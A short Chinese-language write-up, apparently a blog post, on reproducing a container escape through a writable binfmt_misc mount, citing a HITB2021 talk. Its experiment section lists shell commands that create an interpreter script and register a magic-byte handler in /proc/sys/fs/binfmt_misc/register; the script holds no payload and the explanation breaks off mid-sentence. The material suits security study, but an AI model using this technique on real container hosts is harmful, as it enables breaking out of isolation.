敏感挂载binfmt_misc容器逃逸复现和分析

目录

前言

binfmt_mics

实验

参考

前言

对于/proc下有很多挂载会导致容器逃逸，其中binfmt_misc就是一种可以利用的逃逸挂载

binfmt_mics

/proc/sys/fs/binfmt_misc的功能可以让我们的Linux内核执行

向/proc/sys/fs/binfmt_misc /register

实验

touch test_fmt_intp
echo aaa > test_fmt
echo '#!/bin/sh' > test_fmt_intp
echo '' >> test_fmt_intp
chmod +x test_fmt_intp
echo ':test_fmt:M::\x61\x61\x61::/home/test/test_fmt_intp:' > /proc/sys/fs/binfmt_misc/register

参考

#HITB2021SIN D2T2 - Container Escape In 2021 - Li Qiang